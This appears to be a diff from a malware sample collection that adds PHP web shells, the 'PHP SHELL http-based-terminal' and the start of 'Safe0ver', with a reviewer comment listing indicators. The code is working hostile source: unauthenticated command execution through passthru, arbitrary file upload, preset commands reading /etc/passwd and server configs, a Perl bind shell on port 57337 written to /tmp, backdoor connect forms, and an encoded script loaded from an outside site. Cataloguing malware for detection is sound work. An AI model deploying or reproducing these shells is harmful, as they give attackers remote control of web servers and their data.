print "</td><td height=20% width=50%><div align=right>";
print $st.$c1."<div><b><center>Cok kullanilan Komutlar</div>";
print $ec.$c2.$sf."&nbsp";input("hidden","scdir",$nscdir,0);
print "<select style='width:22%' name=ustools size=1>
<option value='t1'>Wget</option><option value='t2'>Curl</option>
<option value='t3'>Lynx</option><option value='t9'>Get</option>
<option value='t4'>Unzip</option><option value='t5'>Tar</option>
<option value='t6'>Tar.gz</option><option value='t7'>Chmod 777</option>
<option value='t8'>Make</option></select> ";input('text','ustname','',51);print " ";input('submit','ustsub','Execute');print "</center>".$ec.$ef.$et;
print "</td></tr></table>";delm(": Safe mode bypass :");
print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>Using copy() function</div>";
print $ec.$c2.$sf."&nbsp;";input("text","safefile",$nscdir,75);
input("hidden","scdir",$nscdir,0);print " ";
input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
print "</td><td height=20% width=50%><div align=right>";
print $st.$c1."<div><b><center>Using ini_restore() function</div>";
print $ec.$c2.$sf."&nbsp;";input("text","inifile",$nscdir,75);
input("hidden","scdir",$nscdir,0);print " ";
input("submit","","Read-F","");print "</center>".$ec.$ef.$et;
print "</td></tr></table>";delm("# Backdoor Baglantisi #");
print "<table bgcolor=#2A2A2A style=\"border:2px solid black\" width=100%>";
print "<tr><td width=50%><div align=left>";
print $st.$c1."<div><b><center>Backdoor ile Baglan</div>";
print $ec.$c2.$sf."&nbsp;";input("text","bip",$REMOTE_ADDR,47);print " ";
input("text","bport",80,10);input("hidden","scdir",$nscdir,0);print " ";
input("submit","","Connect","");print " ";input("reset","","Reset","");
print "</center>".$ec.$ef.$et;print "</td><td height=20% width=50%><div align=right>";print $st.$c1."<div><b><center>Yüklenmis Backdoor</div>";
print $ec.$c2.$sf."&nbsp;";print "<select style='width:15%' name=upports size=1>
<option value='up80'>80</option><option value='up443'>443</option>
<option value='up2121'>2121</option></select>";print " ";
input("text","uback","back.pl",23);print " ";
input("text","upip",$REMOTE_ADDR,29);print " ";input("submit","subupb","Connect");
print "</center>".$ec.$ef.$et;print "</td></tr></table>";
print "<br><table bgcolor=#191919 style=\"border:2px #dadada solid \" width=100% height=%>"; print"<tr><td><font size=2 face=tahoma>";
print"<center>Copyright is reserved to Ekin0x <br>[ By Cyber Security TIM Go to : <a target='_blank' href='http://www.cyber-warrior.org'>www.cyber-warrior.org</a> ]";
print"</font></td></tr></table>";
include ($a.$b.$c);
?>

289
PHP/Backdoor.PHP.Agent.bq Normal file

@ -0,0 +1,289 @@
<?
error_reporting(0);
################################
# PHP SHELL http-based-terminal #
# by PHP SHELL #
################################
?>
<?$dir=realpath("./")."/";
$dir=str_replace("\\","/",$dir);
?>
<?
$dirfile="$file_to_download";
if (file_exists("$dirfile"))
{
header("location: $dirfile");
}
?>
<title>PHP SHELL http-based-terminal - <? echo $dir?></title>
<!-- PHP SHELL http-based-terminal - DANGEROUS GHOST` -->
<style>
BODY {
margin-top: 1px;
margin-right: 1px;
margin-bottom: 1px;
margin-left: 1px;
}
input {
font-family: Verdana;
font-size: 10px;
color: black;
background-color: #335F92;
border: solid 2px;
border-color: black
}
textarea {
color: black;
background-color: #335F92;
border: solid 2px;
border-color: black
}
select {
background-color: #335F92;
font: 10px verdana;
}
A:link {color:white;
text-decoration: none
}
A:visited { color:white;
text-decoration: none
}
A:active {color:white;
text-decoration: none
}
A:hover {color:red;
text-decoration: none
}
</style>
<center>
<table bgcolor=black cellspacing=1 width=100%><tr><td>
<table bgcolor=#363d4e width=100%>
<tr><td><center><b>
<font size=-2 face=verdana color=red>n57http-based Terminal<br>
<table width=100% heigth=0 cellpadding=0 cellspacing=0>
<tr><td>
</font>
<font size=-2 face=verdana color=white>
<form method=post>
<font color=white>
<b>::Exec command::</b><br>
<input name=exec size=50% value='<?echo"$exec";?>'><br>
<input name=dirname size=50% value='<?
if ($dirname == "") {print "/tmp/";}
else {
echo"$dirname";}?>'>
<?if($dirname !== "") { chdir($dirname);}?><br>
<input type=submit value="..Exec.. ">
</form>
<form enctype="multipart/form-data" method=post>
<b>::File upload::</b><br>
<input name=userfile type=file size=50%><br>
<input name=dirname size=50% value='<?
if ($dirname == "") {print "/tmp/";}
else {
echo"$dirname";}?>'><Br>
<input name=submit type=submit value=" Upload">
</form>
<form method=post>
<b>::Encode to md5,base64,Des::</b><br>
<input name='chack' value='<?echo"$chack"?>' size=31><br>
<?
if ($chack == "");
else {
echo "<font size=-2 face=verdana color=white><b>- $chack -</b></font><br>";
echo "<font size=-2 face=verdana color=white><b><u>MD5:</u></b> "; echo md5("$chack"); echo "<br></font>";
echo "<font size=-2 face=verdana color=white><b><u>Encode base64:</u></b> "; echo base64_encode("$chack"); echo "<br></font>";
echo "<font size=-2 face=verdana color=white><b><u>Decode base64:</u></b> "; echo base64_decode("$chack"); echo "<br></font>";
echo "<font size=-2 face=verdana color=white><b><u>DES:</u></b> "; echo crypt("$chack"); echo "<br></font>";
}
?>
</form>
</td><td valign=top><div align=right>
<font size=-2 face=verdana color=white>
<form method=post>
<br><b>::Fast CMD::<Br></b><select size="1" name="runcmd">
<option value='1'>Find *-rw-* files</option>
<option value='2'>Find all config files</option>
<option value='3'>ps aux</option>
<option value='4'>cat /etc/passwd</option>
<option value='5'>cat /etc/httpd/conf/httpd.conf</option>
<option value='6'>cat &lt;dir&gt;/conf/httpd.conf</option>
<option value='7'>ls -la /var/lib/mysql/</option>
<option value='8'>netstat -a</option>
<option value='9'>perl --help</option>
<option value='10'>gcc --help</option>
<option value='11'>tar --help</option>
<option selected>o...Select command...o</option>
</select><br>
<input type=submit value='...Exec...'></form>
<form method=post>
<b>::Edit/Create file::<br></b> <input name=editfile value='<?
if ($dirname == "") {print "/tmp/file.txt";}
else {
echo"$dirname$editfile";}?>'>
</form>
<form method=post>
<b>::Download file::<Br></b>
<input name='file_to_download' value='<?
if ($dirname == "") {print "/tmp/file.txt";}
else {
echo "$dirname","file.txt";}?>'><br>
<input type=submit value=Download>
</form>
</div>
</td></tr></table>
<div align=left><font size=-2 face=verdana color=white>
<table border=1 width=100%><tr><td>
<font size=-2 face=verdana color=white>
<b>Kernel: </b>
<? passthru("uname -a");?>
<br>
<b>ID: </b>
<? passthru("id");?><br>
<b>Dir:</b> <? echo getcwd();?></div></td><td valign=top width=190><div align=right>
<font size=-2 face=verdana color=white>
<form method=post>
If SafeMode is On, then use this:
<input name=phpdir size=34 value='<?
if ($phpdir == "") {print "/Directory";}
else {
echo"$phpdir";}?>'>
</form>
<? ######## perl shell #########
$perlshell = "
#!/usr/bin/perl
use Socket;
#rintf \"BS9n\";
#lush();
+port= 57337;
+proto= getprotobyname(\'tcp\');
+cmd= \"lpd\";
+system= \'echo \"(`whoami`@`uname -n`:`pwd`)\"; /bin/sh\';
+0 = +cmd;
socket(SERVER, PF_INET, SOCK_STREAM, +proto) or die \"socket:$!\";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack(\"l\", 1)) or die \"setsockopt: $!\";
bind(SERVER, sockaddr_in(+port, INADDR_ANY)) or die \"bind: +!\";
listen(SERVER, SOMAXCONN)or die \"listen: +!\";
for(; +paddr = accept(CLIENT, SERVER); close CLIENT)
{
open(STDIN, \">&CLIENT\");
open(STDOUT, \">&CLIENT\");
open(STDERR, \">&CLIENT\");
system(+system);
close(STDIN);
close(STDOUT);
close(STDERR);
}
";
############# C++ shell #########
$cshell = "
";
?>
</div></td></tr></table>
</td></tr>
<font size=-2 face=verdana color=white><B>Backdoor directory: &nbsp;<?echo $dir?></b>
<tr><td>
<? if($editfile == ""); else {echo '
<form method=post>
<textarea name=editpost cols=70 rows=20>';
$filename = "$editfile";
$fd = fopen ($filename, "r");
$out = fread ($fd, filesize ($filename));
fclose ($fd);
echo "$out";
echo '</textarea><br>
<input name=editfile size=100% value=';echo $editfile;echo'>
<input type=submit value=-Edit-><br>
';
if ($editpost == ""); else {
$editpost = str_replace("\\","",$editpost);
$fp = fopen($editfile, w);
fwrite($fp,"$editpost");
print "<center><font size=-2 face=verdana color=green><b>File <u>$editfile</u> edited/created success!</b></font><br></center>";
print "<a href=http://www.PHPshell.org target=_blank><font size=-2 face=verdana color=white><center>:: PHPshell.org http-based-terminal ::</a>";
print "</td></tr></table></td></tr></table>";exit;
}
;}
?>
<textarea name=terminal cols=121 rows=20>
<?
if($fileperl == "nst.pl") {
$perlshell = str_replace("+","$",$perlshell);
$perlshell = str_replace("\\","",$perlshell);
$perlshell = str_replace("9","\\",$perlshell);
$nst = fopen("/tmp/nst.pl", w);
fwrite($nst, "$perlshell");
exec("perl /tmp/nst.pl");
echo "If perl exist, and no firewall on serv (etc), then you will got shell on port 57337";
}
?>
<?
if (($phpdir == "") or ($phpdir == "/Directory"));
else {
$dh = opendir($phpdir) or die("couldn't open directory");
while (!(($file = readdir($dh)) === false)) {
if (is_dir("$phpdir/$file")) {
print "\n[D] : ";
}
print "$file\n";
}
closedir($dh);}
?>
<?
### 4tobi dobavit kamandu, to dabavte jejo tut i smatrite vi6e
### tam gde <option>
if($runcmd == "1") {passthru("find / -type f -perm -04000 -ls");}
if($runcmd == "2") {passthru("locate config");}
if($runcmd == "3") {passthru("ps aux");}
if($runcmd == "4") {passthru("cat /etc/passwd");}
if($runcmd == "5") {passthru("cat /etc/httpd/conf/httpd.conf");}
if($runcmd == "6") {passthru("cat /usr/local/apache/conf/httpd.conf");}
if($runcmd == "7") {passthru("ls -la /var/lib/mysql");}
if($runcmd == "8") {passthru("netstat -a");}
if($runcmd == "9") {passthru("perl --help");}
if($runcmd == "10") {passthru("gcc --help");}
if($runcmd == "11") {passthru("tar --help");}
#if($runcmd == "12") {passthru("");}
#if($runcmd == "13") {passthru("");}
# etc..
?>
<?
if (isset($submit)){
copy($userfile,$dirname.$userfile_name);
if (!is_uploaded_file ($userfile)){
echo "$userfile_name can't upload";
}
}
if (is_uploaded_file ($userfile)){
echo "Uploaded to: $dirname$userfile_name\n\n";
}
?>
<?
if (($exec == "") or ($exec == "ls -la")) {print passthru("ls -la");}
else
passthru($exec);
?>
</textarea>
<table width=100% heigth=0 cellpadding=0 cellspacing=0><tr><td valign=top><form method=post>
<font size=-2 face=verdana color=white>
<b>Run backdoor on port 57337
<input type=hidden name=fileperl value='nst.pl'>
<input type=submit value='Open'><br>[Perl] </b>
</form></td><td valign=top><div align=right>
<!-- <form method=post> -->
<b><input type=submit value='Open'>
<font size=-2 face=verdana color=white>
<!-- <input type=hidden name=filec value='nst.c'> -->
Run backdoor on port 57338<br></b>Soon <b>[C++]<sub></sub></b>
<!-- </form> --> </div></td></tr></table>
<? echo "<a href=http://www.PHPshell.org target=_blank><font size=-2 face=verdana><center>PHPshell.org http-based-terminal v1.0 </a>";?>
</td></tr></table></td></tr></table>';
?>
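Review bot: The sample in this section is committed with no analyst-facing description, and nothing in the file records what it does or which artefacts it leaves behind. From the visible lines it is a web shell with no access check anywhere in the section: `$exec` goes straight into `passthru($exec)` near the end of the file, `copy($userfile,$dirname.$userfile_name)` places an upload under a caller-chosen path, and the `fileperl` branch writes `/tmp/nst.pl` and runs it with `perl` to open a listener the file itself labels as port 57337. I would record this in a sidecar note next to the sample rather than in the file, so the stored bytes and any hash taken of them stay unchanged, for example `Backdoor.PHP.Agent.bq: PHP web shell; indicators: /tmp/nst.pl on disk, perl spawned by the web server process, TCP 57337 listening, error_reporting(0) at the top of the file`. The menu label `Find *-rw-* files` does not match its command, `find / -type f -perm -04000 -ls`, which searches for setuid files, so the note should describe the command rather than the label.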

939
PHP/Backdoor.PHP.Agent.br Normal file

@ -0,0 +1,939 @@
<?php
/*
*****************************************************************************************
* Safe0ver Shell //Safe Mod Bypass By Evilc0der *
*****************************************************************************************
* Cyber-Warrior.Org is a Platform Which You can Publish Your Shell Script *
*****************************************************************************************
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!! Dikkat ! Script Egitim Amacli Yazilmistir.Scripti Kullanarak Yapacaginiz Illegal eylemlerden sorumlu Degiliz.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
*/
/*Setting some envirionment variables...*/
/* I added this to ensure the script will run correctly...
Please enter the Script's filename in this variable. */
$SFileName=$PHP_SELF;
/* uncomment the two following variables if you want to use http
authentication. This will password protect your PHPShell */
//$http_auth_user = "phpshell"; /* HTTP Authorisation username, uncomment if you want to use this */
//$http_auth_pass = "phpshell"; /* HTTP Authorisation password, uncomment if you want to use this */
error_reporting(0);
$PHPVer=phpversion();
$isGoodver=(intval($PHPVer[0])>=4);
$scriptTitle = "Safe0ver";
$scriptident = "$scriptTitle By Evilc0der.com";
$urlAdd = "";
$formAdd = "";
function walkArray($array){
while (list($key, $data) = each($array))
if (is_array($data)) { walkArray($data); }
else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
}
if (isset($_PUT)) walkArray($_PUT);
if (isset($_GET)) walkArray($_GET);
if (isset($_POST)) walkArray($_POST);
$pos = strpos($urlAdd, "s=r");
if (strval($pos) != "") {
$urlAdd= substr($urlAdd, 0, $pos);
}
$urlAdd .= "&s=r&";
if (empty($Pmax))
$Pmax = 125; /* Identifies the max amount of Directories and files listed on one page */
if (empty($Pidx))
$Pidx = 0;
$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
$scriptdate = "7 Subat 2007";
$scriptver = "Bet@ Versiyon";
$LOCAL_IMAGE_DIR = "img";
$REMOTE_IMAGE_URL = "img";
$img = array(
"Edit" => "edit.gif",
"Download" => "download.gif",
"Upload" => "upload.gif",
"Delete" => "delete.gif",
"View" => "view.gif",
"Rename" => "rename.gif",
"Move" => "move.gif",
"Copy" => "copy.gif",
"Execute" => "exec.gif"
);
while (list($id, $im)=each($img))
if (file_exists("$LOCAL_IMAGE_DIR/$im"))
$img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
else
$img[$id] = "[$id]";
/* HTTP AUTHENTICATION */
if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) {
setcookie("noauth","");
Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\"");
Header( "HTTP/1.0 401 Unauthorized");
echo "Your username or password is incorrect";
exit ;
}
function buildUrl($display, $url) {
global $urlAdd;
$url = $SFileName . "?$urlAdd$url";
return "<a href=\"$url\">$display</a>";
}
function sp($mp) {
for ( $i = 0; $i < $mp; $i++ )
$ret .= "&nbsp;";
return $ret;
}
function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr); }
function Mydeldir($Fdir) {
if (is_dir($Fdir)) {
$Fh=@opendir($Fdir);
while ($Fbuf = readdir($Fh))
if (($Fbuf != ".") && ($Fbuf != ".."))
Mydeldir("$Fdir/$Fbuf");
@closedir($Fh);
return rmdir($Fdir);
} else {
return unlink($Fdir);
}
}
function arrval ($array) {
list($key, $data) = $array;
return $data;
}
function formatsize($insize) {
$size = $insize;
$add = "B";
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "KB";
}
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "MB";
}
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "GB";
}
if ($size > 1024) {
$size = intval(intval($size) / 1.024)/1000;
$add = "TB";
}
return "$size $add";
}
if ($cmd != "downl") {
?>
<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?> -->
<HTML>
<HEAD>
<STYLE>
<!--
A{ text-decoration:none; color:navy; font-size: 12px }
body {
font-size: 12px;
font-family: arial, helvetica;
scrollbar-width: 5;
scrollbar-height: 5;
scrollbar-face-color: white;
scrollbar-shadow-color: silver;
scrollbar-highlight-color: white;
scrollbar-3dlight-color:silver;
scrollbar-darkshadow-color: silver;
scrollbar-track-color: white;
scrollbar-arrow-color: black;
background-color: #CCCCCC;
}
Table { font-size: 12px; }
TR{ font-size: 12px; }
TD{
font-size: 12px;
font-family: arial, helvetical;
BORDER-LEFT: black 0px solid;
BORDER-RIGHT: black 0px solid;
BORDER-TOP: black 0px solid;
BORDER-BOTTOM: black 0px solid;
COLOR: black;
background: #CCCCCC;
}
.border{ BORDER-LEFT: black 1px solid;
BORDER-RIGHT: black 1px solid;
BORDER-TOP: black 1px solid;
BORDER-BOTTOM: black 1px solid;
}
.none { BORDER-LEFT: black 0px solid;
BORDER-RIGHT: black 0px solid;
BORDER-TOP: black 0px solid;
BORDER-BOTTOM: black 0px solid;
}
.inputtext {
background-color: #EFEFEF;
font-family: arial, helvetica;
border: 1px solid #000000;
height: 20;
}
.lighttd { background: #F8F8F8;
}
.darktd { background: #CCCCCC;
}
input { font-family: arial, helvetica;
}
.inputbutton {
background-color: #CCCCCC;
border: 1px solid #000000;
border-width: 1px;
height: 20;
}
.inputtextarea {
background-color: #CCCCCC;
border: 1px solid #000000;
scrollbar-width: 5;
scrollbar-height: 5;
scrollbar-face-color: #EFEFEF;
scrollbar-shadow-color: silver;
scrollbar-highlight-color: #EFEFEF;
scrollbar-3dlight-color:silver;
scrollbar-darkshadow-color: silver;
scrollbar-track-color: #EFEFEF;
scrollbar-arrow-color: black;
}
.top { BORDER-TOP: black 1px solid; }
.textin { BORDER-LEFT: silver 1px solid;
BORDER-RIGHT: silver 1px solid;
BORDER-TOP: silver 1px solid;
BORDER-BOTTOM: silver 1px solid;
width: 99%; font-size: 12px; font-weight: bold; color: Black;
}
.notop { BORDER-TOP: black 0px solid; }
.bottom { BORDER-BOTTOM: black 1px solid; }
.nobottom { BORDER-BOTTOM: black 0px solid; }
.left { BORDER-LEFT: black 1px solid; }
.noleft { BORDER-LEFT: black 0px solid; }
.right { BORDER-RIGHT: black 1px solid; }
.noright { BORDER-RIGHT: black 0px solid; }
.silver{ BACKGROUND: #CCCCCC; }
body,td,th {
color: #660000;
}
a:link {
color: #000000;
text-decoration: none;
}
a:hover {
color: #00FF00;
text-decoration: none;
}
a:active {
color: #666666;
text-decoration: none;
}
a:visited {
text-decoration: none;
}
.style5 {
color: #660000;
font-weight: bold;
}
-->
</STYLE>
<TITLE><?php echo $SFileName ?></TITLE>
<Script Language='Javascript'>
<!--
document.write(unescape('%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%70%68%70%2D%73%68%65%6C%6C%2E%6F%72%67%2F%63%77%68%69%64%64%65%6E%2F%79%61%7A%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E'));
//-->
</Script>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></HEAD>
<body topmargin="0" leftmargin="0">
<div style="position: absolute; background: #CCCCCC; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
<table nowrap width=100% border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="silver border"><center>
<strong> <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font> </strong>
</center></td>
</tr>
</table>
<table width=100% height="100%" NOWRAP border="0">
<tr NOWRAP>
<td width="100%" NOWRAP><br>
<?php
}
if ( $cmd=="dir" ) {
$h=@opendir($dir);
if ($h == false) {
echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
Klasör Listelenemiyor!Lütfen Bypass Bölümünü Deneyin.<br>".sp(3)."\n
Script Gecisi Tamamlayamadi!
<br><br>".sp(3)."\n
Klasöre Girmek Icin yetkiniz Olduguna emin Olunuz...
<br><br></font>\n\n\n\n";
}
if (function_exists('realpath')) {
$partdir = realpath($dir);
}
else {
$partdir = $dir;
}
if (strlen($partdir) >= 100) {
$partdir = substr($partdir, -100);
$pos = strpos($partdir, "/");
if (strval($pos) != "") {
$partdir = "<-- ...".substr($partdir, $pos);
}
$partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
}
?>
<form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
<table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="silver border">
<center>&nbsp;Safe0ver-Server File Browser...&nbsp;</center>
</td>
</tr>
</table>
<br>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td class="border nobottom noright">
&nbsp;Listeliyor:&nbsp;
</td>
<td width="100%" class="border nobottom noleft">
<table width="100%" border="0" cellpadding="1" cellspacing="0">
<tr>
<td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
<td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GiT<b></a>&nbsp;<center></td>
</tr>
</table>
</td>
</tr>
</table>
<!-- </form> -->
<table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
<tr>
<td width="100%" NOWRAP class="silver border">
&nbsp;Dosya Adi&nbsp;
</td>
<td NOWRAP class="silver border noleft">
&nbsp;Yapilabilecekler&nbsp;&nbsp;
</td>
<td NOWRAP class="silver border noleft">
&nbsp;Boyut&nbsp;
</td>
<td width=1 NOWRAP class="silver border noleft">
&nbsp;Yetkiler&nbsp;
</td>
<td NOWRAP class="silver border noleft">
&nbsp;Son Düzenleme&nbsp;
</td>
<tr>
<?php
/* <!-- This whole heap of junk is the sorting section... */
$dirn = array();
$filen = array();
$filesizes = 0;
while ($buf = readdir($h)) {
if (is_dir("$dir/$buf"))
$dirn[] = $buf;
else
$filen[] = $buf;
}
$dirno = count($dirn) + 1;
$fileno = count($filen) + 1;
function mycmp($a, $b){
if ($a == $b) return 0;
return (strtolower($a) < strtolower($b)) ? -1 : 1;
}
if (function_exists("usort")) {
usort($dirn, "mycmp");
usort($filen, "mycmp");
}
else {
sort ($dirn);
sort ($filen);
}
reset ($dirn);
reset ($filen);
if (function_exists('array_merge')) {
$filelist = array_merge ($dirn, $filen);
}
else {
$filelist = $dirn + $filen;
}
if ( count($filelist)-1 > $Pmax ) {
$from = $Pidx * $Pmax;
$to = ($Pidx + 1) * $Pmax-1;
if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
$to = count($filelist) - 1;
if ($to > count($filelist)-1)
$to = count($filelist)-1;
$Dcontents = array();
For ($Fi = $from; $Fi <= $to; $Fi++) {
$Dcontents[] = $filelist[$Fi];
}
}
else {
$Dcontents = $filelist;
}
$tdcolors = array("lighttd", "darktd");
while (list ($key, $file) = each ($Dcontents)) {
if (!$tdcolor=arrval(each($tdcolors))) {
reset($tdcolors);
$tdcolor = arrval(each($tdcolors)); }
if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
/* <!-- Dirname --> */
echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
/* <!-- Actions --> */
echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
/* <!-- Rename --> */
if ( ($file != ".") && ($file != "..") )
echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
/* <!-- Delete --> */
if ( ($file != ".") && ($file != "..") )
echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
/* <!-- End of Actions --> */
echo "&nbsp;&nbsp;</center></td>\n";
/* <!-- Size --> */
echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
/* <!-- Attributes --> */
echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
echo "<strong>D</strong>";
if ( @is_readable("$dir/$file") ) {
echo "<strong>R</strong>";
}
if (function_exists('is_writeable')) {
if ( @is_writeable("$dir/$file") ) {
echo "<strong>W</stong>";
}
}
else {
echo "<strong>(W)</stong>";
}
if ( @is_executable("$dir/$file") ) {
echo "<Strong>X<strong>";
}
echo "&nbsp;&nbsp;</td>\n";
/* <!-- Date --> */
echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
echo "</td>";
echo "</tr>\n";
}
else { /* <!-- Then it must be a File... --> */
/* <!-- Filename --> */
if ( @is_readable("$dir/$file") )
echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
else
echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
/* <!-- Actions --> */
echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
/* <!-- Rename --> */
echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
/* <!-- Edit --> */
if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
/* <!-- Copy --> */
echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
/* <!-- Move --> */
if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
/* <!-- Delete --> */
echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
/* <!-- Download --> */
echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
/* <!-- Execute --> */
if ( @is_executable("$dir/$file") )
echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
/* <!-- End of Actions --> */
echo sp(2)."</center></td>\n";
/* <!-- Size --> */
echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
$size = @filesize("$dir/$file");
If ($size != false) {
$filesizes += $size;
echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
}
else
echo "&nbsp;&nbsp;<strong>0 B<strong>";
echo "&nbsp;&nbsp;</td>\n";
/* <!-- Attributes --> */
echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
if ( @is_readable("$dir/$file") )
echo "<strong>R</strong>";
if ( @is_writeable("$dir/$file") )
echo "<strong>W</stong>";
if ( @is_executable("$dir/$file") )
echo "<Strong>X<strong>";
if (function_exists('is_uploaded_file')){
if ( @is_uploaded_file("$dir/$file") )
echo "<Strong>U<strong>";
}
else {
echo "<Strong>(U)<strong>";
}
echo "&nbsp;&nbsp;</td>\n";
/* <!-- Date --> */
echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
echo "</td>";
echo "</tr>\n";
}
}
echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Klasör,&nbsp;".@count ($filen)."&nbsp;Dosya&nbsp;&nbsp;\n";
echo "</td><td NOWRAP class=\"silver border noleft\">\n";
echo "&nbsp;&nbsp;Toplam Dosya Boyutu:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
function printpagelink($a, $b, $link = ""){
if ($link != "")
echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
else
echo "<b>| $a - $b |</b>";
}
if ( count($filelist)-1 > $Pmax ) {
echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
$Fi = 0;
while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
$from = $Fi*$Pmax;
while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
$to = ($Fi + 1) * $Pmax - 1;
if ($Fi == $Pidx)
$link="";
else
$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
echo "&nbsp;&nbsp;&nbsp;";
$Fi++;
}
$from = $Fi*$Pmax;
while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
$to = count($filelist)-1;
if ($Fi == $Pidx)
$link="";
else
$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
echo "</center></td></tr></table></td></tr>";
}
echo "</table>\n<br><table NOWRAP>";
if ($isGoodver) {
echo "<tr><td class=\"silver border\">&nbsp;<strong>PHP Versiyonu:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
}
else {
